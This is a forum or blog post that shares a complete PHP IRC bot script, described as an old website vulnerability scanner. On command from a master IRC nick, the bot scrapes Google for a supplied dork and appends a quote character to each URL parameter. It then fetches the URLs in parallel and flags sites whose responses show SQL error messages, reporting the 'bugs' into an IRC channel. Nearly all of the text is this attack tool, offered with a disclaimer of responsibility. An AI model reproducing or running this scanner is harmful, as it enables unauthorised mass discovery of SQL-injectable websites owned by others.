IRC Client – Website Vulnerability scanner

Hey guys,

This script could only be used as template to create a PHP-based IRC Client/Bot, its vulnerability scanning functions are now useless.

This one comes from the Dark Ages of GRnet, enjoy 🙂

In any case I do not have any responsibility on how the script runs and what errors might pop up on your computer.

<?php

set_time_limit(0);

/**
 * @author Atlantean.
 */

//########################INFORMATION##################################

$server = "global.irc.gr";
$port = 6667;
$me = "php_scanner";
$channel = "#scripting";
$identify = "id";
$master = array("Atlantean");

//EDIT THIS
$max_results = 500; // maximum Google results //
$threads = 10; //URLS TO test IN the same time!!

//#####################################################################

$search = array("mysql_num_rows()", "mysql_fetch_rows()", "main(", "extract()",
    "mysql_result()", "Syntax Error", "You Have An error", "mysql error",
    "SQL ERROR", "Warning: ");
//###############################SERVER WRITE##########################

$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if (!socket_connect($socket, $server, $port))
{
    echo "\n[-]Unable To connect...\n\n\n";
    exit;
}

socket_write($socket, "USER php 127.0.0.1 PHP :PHP Bot\nNICK $me\nJOIN :$channel\n");


//###############################Encode The Dork#############################

function encodeDork($s)
{
    $tmp = "";
    for ($i = 0; $i < strlen($s); $i++)
    {
        $tmp .= "&#" . hexdec(bin2hex($s[$i])) . ";";
    }
    return urlencode($tmp);
}

//###############################cURL MULTI THREAD#############################

function ExecHandle(&$curlHandle)
{
    $flag = null;
    do
    {
        curl_multi_exec($curlHandle, $flag);
    } while ($flag > 0);
}


while ($read = socket_read($socket, 2048))
{
    $cmd = explode(" ", $read);
    $nick = explode(':', $cmd[0]);
    $nick = explode('!', $nick[1]);
    $nick = strtolower($nick[0]);

    switch ($cmd[1])
    {
        case "KICK":
            if ($cmd[3] == $me)
            {
                socket_write($socket, "\nJOIN :" . $channel . "\n");
            }
            break;
        case "PRIVMSG":
            if (in_array($nick, $master))
            {
                switch (str_replace(array(chr(10), chr(13)), '', $cmd[3]))
                {
                    case ":!join":
                        socket_write($socket, "\nJOIN :" . $cmd[4] . "\n");
                        break;
                    case ":!exit":
                        exit(socket_write($socket, "\nQUIT :Connection Lost\n"));
                        break;
                    case ":!part":
                        socket_write($socket, "\nPART :" . $cmd[4] . "\n");
                        break;
                    case ":!sql":
                        if (!isset($cmd[4]))
                        {
                            socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) .
                                "12[-] Enter Dork!\r\n");
                        } else
                        {
                            socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) .
                                "12[+] SQL Vulnerabilty Scan Started ...\nPRIVMSG $channel :" . chr(3) . "4$nick " .
                                chr(3) . "12[+] Dork : $cmd[4] \r\n");

                            $vuln_array = array();

                            $google = "http://www.google.com/search?q=" . encodeDork($cmd[4]) . "&start=0";

                            $ch = curl_init($google);
                            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                            curl_setopt($ch, CURLOPT_HEADER, 0);
                            $ret = curl_exec($ch);
                            curl_close($ch);

                            if (stristr($ret, '302 Moved') != false)
                            {
                                socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) . "12[-] Banned From Google!! \r\n");
                                break;
                            }

                            preg_match_all("/of( about)* <b>([\d,]+)<\/b>/", $ret, $max);
                            $max = str_replace(",", "", $max[2][0]);

                            $max = $max > $max_results ? $max_results : $max;
                            $i = 0;

                            while ($i < $max)
                            {

                                $ch = curl_init("http://www.google.com/search?q=" . encodeDork($cmd[4]) . "&start=" . $i);
                                curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                                curl_setopt($ch, CURLOPT_HEADER, 0);
                                $ret = curl_exec($ch);

                                preg_match_all("/<h3 class=r><a href=\"(.*?)\"/", $ret, $links);

                                if (@$links[1])
                                {
                                    foreach ($links[1] as $l)
                                    {
                                        if (strpos($l, '=') != false)
                                        {
                                            $url = explode('=', $l);
                                            $url = $url[0] . "='";
                                            if (!in_array($url, $vuln_array))
                                            {
                                                array_push($vuln_array, $url);
                                            }
                                        }
                                    }
                                }

                                curl_close($ch);
                                $i = $max > 10 ? $i += 10 : $i++;
                            }

                            array_unique($vuln_array);
                            sort($vuln_array);

                            socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) . "12[+] Got " . count($vuln_array) . " Valid URLs! Injection Started...\r\n");

                            $p = 0;
                            $o = $threads;

                            $curlHandle = curl_multi_init();

                            do
                            {

                                $tmp = count($vuln_array);

                                for ($i = 0; $i < $threads && $i < $tmp; $i++)
                                {
                                    $cURL[$i] = curl_init($vuln_array[$i]);
                                    curl_setopt($cURL[$i], CURLOPT_URL, $vuln_array[$i]);
                                    curl_setopt($cURL[$i], CURLOPT_HEADER, 0);
                                    curl_setopt($cURL[$i], CURLOPT_RETURNTRANSFER, true);
                                    curl_multi_add_handle($curlHandle, $cURL[$i]);
                                }

                                ExecHandle($curlHandle);

                                for ($i = 0; $i < $threads && $i < $tmp; $i++)
                                {
                                    $source[$i] = curl_multi_getcontent($cURL[$i]);
                                }


                                for ($i = 0; $i < $threads && $i < $tmp; $i++)
                                {
                                    foreach ($search as $error)
                                    {
                                        if (stristr($source[$i], $error) != false)
                                        {
                                            socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) .
                                                "12[+] Possible Bug Found: $vuln_array[$i]\n");
                                            $p++;
                                            break;
                                        }
                                    }
                                }


                                for ($i = 0; $i < $threads && $i < $tmp; $i++)
                                {
                                    curl_multi_remove_handle($curlHandle, $cURL[$i]);
                                    unset($vuln_array[$i]);
                                }
                                sort($vuln_array);

                                socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) .
                                    "12[+] Scanned $o...\r\n");
                                $o += $threads;

                                unset($source);
                                unset($cURL);

                            } while (count($vuln_array) > 0);

                            curl_multi_close($curlHandle);

                            unset($vuln_array);
                            unset($source);
                            unset($cURL);

                            socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) . "12[+] Done. $p Bugs Found.\r\n");
                        }
                        break;
                }
            }
            break;
    }

    if ($cmd[0] == "PING")
    {
        socket_write($socket, "PONG " . $cmd[1] . "\n");
    }
}
socket_close($socket);
?>